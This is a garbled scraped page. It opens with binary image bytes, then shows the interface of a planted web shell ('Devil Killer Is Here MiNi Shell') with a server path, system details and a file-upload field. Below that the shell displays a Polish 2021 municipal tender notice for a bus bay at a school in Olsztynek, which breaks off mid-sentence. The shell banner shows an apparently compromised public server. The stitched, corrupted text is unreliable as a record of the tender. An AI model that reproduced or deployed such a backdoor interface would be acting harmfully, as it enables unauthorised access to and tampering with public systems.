JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210908/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210908/0017448901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa zatoki autobusowej przy Szkole Podstawowej nr 1 im. Noblistów Polskich w Olsztynku (postępowanie drugie) </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA OLSZTYNEK</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 510743663</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ratusz 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztynek</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">11-015</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ratusz@olsztynek.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://olsztynek.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa zatoki autobusowej przy Szkole Podstawowej nr 1 im. Noblistów Polskich w Olsztynku (postępowanie drugie) </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e1bb61df-1098-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00174489</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003151/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.4 Budowa zatoki autobusowej przy Szkole Podstawowej nr 1 im. Noblistów Polskich w Olsztynku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://olsztynek.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://olsztynek.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa<br/>się za pomocą środka komunikacji elektronicznej, tj. platformy do elektronicznej obsługi zamówień<br/>publicznych.<br/>2. Korzystanie z Platformy przetargowej przez Wykonawcę jest bezpłatne.<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie przetargowej Gminy Olsztynek. Ma wówczas dostęp do możliwości:<br/>złożenia, zmiany, wycofania oferty, a także funkcjonalności pozwalających na składanie wniosków o<br/>wyjaśnienie treści SWZ oraz komunikację z Zamawiającym w pozostałych obszarach.<br/>5. Do połączenia używany jest szyfrowany protokół HTTPS. Szyfrowanie danych odbywa się przy<br/>pomocy protokołu SSL. Certyfikat SSL zapewnia poufność transmisji danych przesyłanych przez<br/>Internet.<br/>6 Zamawiający, pod linkiem https://olsztynek.logintrade.net/rejestracja/ustawowe/instrukcje.html<br/>udostępnia Wykonawcom instrukcje w następującym zakresie:<br/>1) Rejestracja wykonawcy na platformie przetargowej,<br/>2) Wymagania techniczne,<br/>3) Zadawanie pytań do postępowania,<br/>4) Instrukcje postępowania - Udział w trybie podstawowym bez negocjacji.<br/>7.Wymagania techniczne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii<br/>dokumentów<br/>i oświadczeń oraz informacji przekazywanych przy użyciu Platformy przetargowej:<br/>1) Dopuszczalne przeglądarki internetowe:<br/>a) Internet Explorer 10 i nowsze, Edge,<br/>b) Google Chrome,<br/>c) Mozilla Firefox,<br/>d) Opera.<br/>2) Pozostałe wymagania techniczne:<br/>a) dostęp do sieci internet;<br/>b) obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>c) włączona obsługa JavaScript;<br/>d) zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>e) zainstalowany Acrobat Reader;<br/>f) zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub<br/>nowszy.<br/>8. Wspierane są rozwiązania dostarczane przez firmy:<br/>a) Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.<br/>b) Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.<br/>c) Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies SA.<br/>d) Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.<br/>8. Kodowanie i oznaczenie czasu przekazania danych Czas zapisywany jest w formacie YYYY-MM-DD<br/>HH:MM:SS. Czas przekazania danych jest to czas, w którym zostanie potwierdzone złożenie oferty,<br/>dokumentu przez Wykonawcę. Potwierdzenie odbywa się poprzez kliknięcie w link dostępny w<br/>wiadomości mailowej, wysłanej automatycznie po złożeniu oferty, dokumentu będąc niezalogowanym<br/>na Platformie przetargowej. Wiadomość otrzymuje Wykonawca na adres e-mail wskazany w<br/>formularzu. W przypadku Wykonawcy zalogowanego na platformie przetargowej czas przekazania<br/>danych jest to czas wysłania dokumentu, oferty przez Platformę przetargową.<br/>9. Zalecany maksymalny rozmiar plików przesyłanych za pośrednictwem Platformy przetargowej nie<br/>powinien przekraczać 150 MB.<br/>10. Zalecenia Zamawiającego odnośnie użycia kwalifikowanego podpisu elektronicznego:<br/>1) dla dokumentów w formacie „pdf” zaleca się podpis formatem: PAdES,<br/>2) dla dokumentów w formacie innym niż „pdf” zaleca się podpis formatem: XAdES,<br/>3) Zamawiający zaleca stosowanie podpisu wewnętrznego, który polega na tym, że jest zapisany<br/>łącznie z podpisywanym dokumentem (tworzą jeden plik), a nie oddzielnie (plik podpisywany i plik<br/>podpisu).<br/>11. Szczegółowe wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy<br/>ich użyciu opisane zostały w Instrukcjach korzystania z Platformy przetargowej Gminy Olsztynek.<br/>12. Wsparcie techniczne i instrukcje dla Wykonawców świadczone przez Operatora Platformy<br/>przetargowej uzyskać można w następujący sposób:<br/>1) telefonicznie pod nr (+48) 71 787 35 34 od poniedziałku do piątku, od 8:00 do 16:00,2) e-mail:<br/>helpdesk@logintrade.net</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r.<br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1) administratorem Pani/Pana danych osobowych jest Gmina Olsztynek, z siedzibą przy ul. Ratusz 1,<br/>11-015 Olsztynek;<br/>2) inspektorem ochrony danych osobowych w Gminie Olsztynek jest Pani/Pani Maciej Żołnowski,<br/>maciej.zolnowski@cbi24.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego: „Budowa zatoki autobusowej przy<br/>Szkole Podstawowej nr 1 im. Noblistów Polskich w Olsztynku (postępowanie drugie)” prowadzonym w trybie podstawowym<br/>zgodnie z art. 275 ust. 1 ustawy Pzp.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o Art. 74 ust 1 .ustawy z dnia 11 września 2019 r. – Prawo<br/>zamówień publicznych (Dz. U. z 2019 poz. 2019 ze zm.), dalej „ustawa Pzp”;<br/>5) Pani/Pana dane osobowe będą przechowywane przez okres prowadzenia postępowania o<br/>udzielenie zamówienia publicznego oraz realizacji umowy, a następnie będą przechowywane<br/>począwszy od dnia zakończenia okresu obowiązywania umowy (wliczając okres rękojmi lub gwarancji)<br/>przez okres co najmniej 5 lat (nie krócej jednak, niż okres przedawnienia roszczeń),<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych **;<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych<br/>z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ***;<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>7) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>2. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia,<br/>o którym mowa w art. 16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania<br/>o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą.<br/>3. W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym<br/>mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do<br/>czasu zakończenia tego postępowa.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje przedstawione wyżej.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZBI.271.1.7.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest realizacja zadania inwestycyjnego pn. „Budowa zatoki<br/>autobusowej przy Szkole Podstawowej nr 1 im. Noblistów Polskich w Olsztynku”.<br/>2. Niniejsze przedsięwzięcie zostało zaprojektowane na działkach oznaczonych numerami ew.<br/>8/4, 22/1 i 22/2 obręb 4 m. Olsztynek. W ramach realizacji zadania zakłada się m.in:<br/>1) Budowę nawierzchni zatoki;<br/>2) Budowę nawierzchni peronu i chodnika;<br/>3) Przebudowę nawierzchni zjazdu na teren szkoły;<br/>4) Przestawienie 2 wiat przystankowych;<br/>5) Przebudowę istniejącego ogrodzenia terenu szkoły,<br/>6) Remont i zabezpieczenie istniejących urządzeń infrastruktury technicznej.<br/>3. Szczegółowy opis przedmiotu zamówienia zawarto w następujących dokumentach<br/>stanowiących załączniki<br/>do niniejszej SWZ:<br/>1) Projekt budowlany:<br/>a) Projekt architektoniczno – budowlany;<br/>b) Projekt techniczny;<br/>c) Projekt zagospodarowania terenu;<br/>d) Opinie, pozwolenia, uzgodnienia.<br/>2) Informacja do planu BIOZ.<br/>3) Projekt zmiany stałej organizacji ruchu w związku z projektowaną budową zatoki autobusowej<br/>przy Szkole Podstawowej nr 1 im. Noblistów Polskich w Olsztynku.<br/>4) Specyfikacja Techniczna wykonania i Odbioru Robót (STWiOR).<br/>Dokumentacja zostały zamieszczone w archiwum 7zip. zatytułowanym: Załącznik nr 3 do SIWZ<br/>– Dokumentacja techniczna.<br/>Ww. dokumenty stanowią załącznik do zaświadczenia Starosty Olsztyńskiego z dnia 27 maja<br/>2021 r. numer<br/>BI-II.6743.13.16.2021.IP4<br/>4. Krótki opis projektowanych robót.<br/>1) Roboty drogowe.<br/>Budowa zatoki autobusowej o długości peronu 24,0 m i szerokości 3,0 m położonej przy<br/>krawędzi jezdni ulicy Szkolnej. Obramowanie nawierzchni jezdni zatoki od strony jezdni ulicy<br/>Szkolnej krawężnikiem betonowym najazdowym 15x22 cm ustawionym na ławie betonowej z<br/>oporem a od strony peronu krawężnikiem 15x30 cm wystającym ustawianym na ławie betonowej<br/>z oporem. Zaprojektowana konstrukcja nawierzchni zatoki stanowi:<br/>- kostka betonowa gr. 8 cm koloru szarego spoinowana zaprawą cementową,<br/>- podsypka cementowo-piaskowa gr. 5 cm,<br/>- podbudowa z betonu C-16/20 gr. 22 cm,<br/>- warstwa odsączająca z piasku średniego gr. 20 cm,<br/>- wyrównane i zagęszczone podłoże gruntowe,<br/>Spadek poprzeczny nawierzchni zatoki 2,0% w kierunku jezdni ul. Szkolnej. Powierzchnia<br/>nawierzchni zatoki wynosi 126,40 m2. Bezpośrednio przy krawędzi zatoki zaprojektowano<br/>budowę nawierzchni peronu i chodnika o szerokości 1,5 – 2,0 m. Konstrukcję tej nawierzchni<br/>stanowią:<br/>- kostka betonowa gr. 6 cm koloru szarego,<br/>- podsypka cementowo-piaskowa gr. 5 cm,<br/>- warstwa odsączająca z piasku średniego gr. 20 cm,<br/>- wyrównane i zagęszczone podłoże gruntowe,<br/>Spadek nawierzchni peronu i chodnika 2,0% w kierunku nawierzchni zaprojektowanej zatoki.<br/>Obramowanie nawierzchni do strony zatoki stanowi opisany powyżej krawężnik 15x30 cm a od<br/>strony szkoły obrzeże betonowe 8x30 cm ustawiane na ławie betonowej. Bezpośrednio przy<br/>nawierzchni peronu zaprojektowano ustawienie wiat przystankowych, w okolicy których<br/>zaprojektowano wykonanie nawierzchni z kostki betonowej o konstrukcji jak opisana wyżej.<br/>Łącznie projektuje się budowę nawierzchni peronu i chodnika o powierzchni 117,30 m2. W<br/>związku z koniecznością dostosowania rzędnych nawierzchni istniejącego zjazdu na teren szkoły oraz<br/>chodnika doprowadzającego pieszych z kierunku Przedszkola Miejskiego, zaprojektowano<br/>przełożenie istniejącej nawierzchni zjazdu z kostki betonowej gr. 8 cm na powierzchni 32,60 m2,<br/>bez konieczności naruszania podbudowy zjazdu. Zaprojektowano również przełożenie<br/>nawierzchni chodnika z kostki betonowej gr. 6 cm na powierzchni 8,10 m2 wraz z ustawieniem<br/>nowego obrzeża betonowego 8x30 cm na odcinku długości 5,0 m. Realizacją opisanych powyżej<br/>robót wymaga również przestawienia istniejących przy krawędzi zjazdu na teren szkoły<br/>krawężników na odcinku długości 10 m.<br/>2) Roboty sanitarne.<br/>Projektowane roboty branży sanitarnej związane z realizacją zadania obejmują:<br/>- wykonanie rozbiórki istniejących studni kanalizacji deszczowej Dn1200 oraz jej odtworzenia<br/>(odbudowy),<br/>- rozbiórkę istniejącej i budowę nowej studzienki ściekowej Dn500,<br/>Posadowienie studni w gruncie bezpośrednie na ławie z betonu C-12/15 gr. 0,15-0,30 m.<br/>Elementy studzienek zaprojektowano z prefabrykowanych elementów wykonanych z betonu<br/>klasy C-30/37. Roboty związane z odtworzeniem studni kanalizacji deszczowej wykonywane w<br/>wykopach szalowanych.<br/>Ze względu na lokalizację studni kanalizacyjnej w jezdni zatoki autobusowej, zaprojektowano jej<br/>przykrycie włazem żeliwnym z pokrywą wyposażoną w zawias oraz rygiel, przystosowanym do<br/>przenoszenia obciążeń klasy D-400. W ramach przebudowy studni, zaprojektowano<br/>przełączenie do niej istniejących dopływów i odpływu kanalizacyjnych. Przykrycie projektowanej<br/>studzienki ściekowej wpustem żeliwnym z uchylnym rusztem na zawiasie, przystosowanym do<br/>przenoszenia obciążeń klasy D-400. Zastosowane rozwiązania projektowe zawierają załączone<br/>w niniejszym opracowaniu rysunki techniczne.<br/>3) Roboty elektryczne.<br/>Projektowana budowa zatoki autobusowej wymaga wykonania robót związanych z<br/>zabezpieczeniem rurami ochronnymi dwudzielnymi istniejącego przyłącza kablowego eNN 0,4<br/>kV zasilającego istniejące urządzenia teletechniczne na działce nr 22/1 obr. 0004 m. Olsztynek<br/>oraz istniejącej wewnętrznej linii kablowej eNN 0,4 kV zasilającej oświetlenie zewnętrzne terenu<br/>Szkoły Podstawowej nr 1 im. Noblistów Polskich w Olsztynku. Istniejące przyłącze jest<br/>przyłączem abonenckim zarządzanym przez Ośrodek Eksploatacji i Zarządzania Miejską Siecią<br/>Komputerową „OLMAN” z siedzibą przy ul. J. Heweliusza 8, 10-726 Olsztyn. Siecią zasilającą<br/>oświetlenie zarządza Dyrektor Szkoły Podstawowej w Olsztynku. Zaprojektowano<br/>zabezpieczenie istniejącego przyłącza wykonanego kablem YAKY 4x25 mm2 rurą ochronną<br/>dwudzielną typu A83PS długości L=24,0 m. Zaprojektowano zabezpieczenie istniejącego linii<br/>kablowej zasilającej oświetlenie zewnętrzne szkoły wykonanej kablem YKY 5x2,5 mm2 rurą<br/>ochronną dwudzielną typu A83PS długości L=12,0 m.<br/>4) Ogrodzenie terenu szkoły.<br/>W miejscu projektowanego do rozbiórki ogrodzenia terenu szkoły, na odcinku od ulicy Górnej do<br/>wjazdu na teren szkoły zaprojektowano wykonanie nowego ogrodzenia z siatki metalowej w<br/>ramach z kątownika wysokości 1,2 m, mocowanych do słupków stalowych posadowionych w<br/>gruncie na stopach betonowych. W sąsiedztwie projektowanych wiat przystankowych<br/>zaprojektowano furtkę wejściową na teren szkoły szerokości 1,6 m dwuskrzydłową. W linii<br/>projektowanego ogrodzenia projektuje się do pozostawienia istniejące urządzenia<br/>teletechniczne (szafy) wraz z ze złączami kablowymi elektroenergetycznymi. Łącznie długość<br/>projektowanego ogrodzenia wynosi 82,0 mb.<br/>5) Wiaty przystankowe.<br/>Na projektowanym do utwardzenia terenie przy peronie, zaprojektowano ustawienie dwóch wiat<br/>przystankowych typu EOS-S, projektowanych do przeniesienia z istniejącego przystanku przy<br/>położonego przy nieruchomości Przedszkola Miejskiego w Olsztynku. Wiaty te stanowią<br/>własność Gminy Olsztynek. Wiaty te są wykonane z profili z lakierowanej blachy stalowej<br/>ocynkowanej (ściany) z wypełnieniem ze szkła hartowanego. Pokrycie dachu stanowią również<br/>profilowana lakierowana blacha stalowa ocynkowana, wzmocniona profilami metalowymi.<br/>Powierzchnia zabudowy jednej wiaty wynosi 5,20 m2, wysokość netto wewnątrz wiaty wynosi 2,2 m, wysokość brutto 2,40 m. Wiata wyposażona jest w ławkę mocowaną do ściany oraz<br/>gablotę na rozkład jazdy. Posadowienie wiat w gruncie zaprojektowano na stopach betonowych.<br/>Odprowadzenie wody z nawierzchni przy wiatach powierzchniowo na teren zielony z tyłu wiat.<br/>W ramach zadania należy zdemontować wiaty z obecnej zatoki i ponownie zamontować w<br/>miejscu określonym w projekcie. Teren demontażu wiat należy uporządkować.<br/>6) Projektowana zatoka autobusowa<br/>Projektowana do budowy zatoka będzie służyła do obsługi transportu uczniów Szkoły<br/>dojeżdżających środkami transportu zbiorowego organizowanymi przez Szkołę. Jednia zatoki<br/>służyła będzie do postoju środków transportu podczas wsiadania i wysiadania uczniów.<br/>Nawierzchnia peronu przy zatoce służyła będzie do ruchu pieszych, zarówno uczniów<br/>korzystających z transportu jak też pieszych podążających ulicą Szkolną. Dojście uczniów do<br/>peronu poprzez istniejące bramy wejściowe na teren szkoły jak też poprzez projektowaną w<br/>przebudowywanym ogrodzeniu furtkę. Projektowane wiaty przystankowe służyły będą do<br/>ochrony przed wpływem warunków atmosferycznych oczekujących na transport uczniów.<br/>7) Wycinka drzew<br/>W ramach realizacji przedmiotu zamówienia wykonawca zobowiązany jest wykonać wycinki 10<br/>drzew na podstawie decyzji uzyskanych przez Zamawiającego (obecnie Zamawiający złożył<br/>wniosek o wydanie 